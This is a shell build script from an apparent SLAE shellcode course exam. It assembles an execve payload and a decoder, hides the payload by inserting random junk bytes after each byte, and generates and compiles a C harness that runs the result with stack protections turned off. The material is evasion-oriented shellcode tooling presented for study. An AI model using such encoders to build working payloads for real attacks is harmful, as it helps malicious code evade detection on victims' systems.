SLAE/exam4/make.sh

#!/usr/bin/env sh
#
# This script will generate shellcode.c and compile it
#

#
# Compile the payload and decoder
#
echo " [+] Compiling the payload and decoder ..."
SPAYLOAD=./execve-stack
nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
SDECODER=./decoder
nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o

echo " [+] Preparing decoder shellcode ..."
DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)

#
# Encode the payload shellcode
#
echo " [+] Encoding the payload shellcode ..."
#
#  $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
#  00000000  37                aaa
#  00000001  FA                cli
#  00000002  D6                salc
#  00000003  3F                aas
#

# Permutation code
garbage=('\x37' '\xFA' '\xD6' '\x3F');
#ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[$(shuf --random-source=/dev/urandom -z -i 999-999999 -n1)%4]]}; done; echo -n "\xAF\"")
ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[$(od -A n -N 2 -t u2 /dev/urandom)%4]]}; done; echo -n "\xAF\"")


FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}

#
# Generate shellcode.c
#
echo " [+] Generating shellcode.c file ..."
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>

unsigned char code[] = \
$FULL_SHELLCODE;

main()
{
	printf("Shellcode Length:  %d\n", strlen(code));
	int (*ret)() = (int(*)())code;
	ret();
}
EOF

#
# Compile C code with GCC
#
echo " [+] Compiling shellcode.c with GCC ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode

ls -la ./shellcode

#
# Cleanup
#
rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o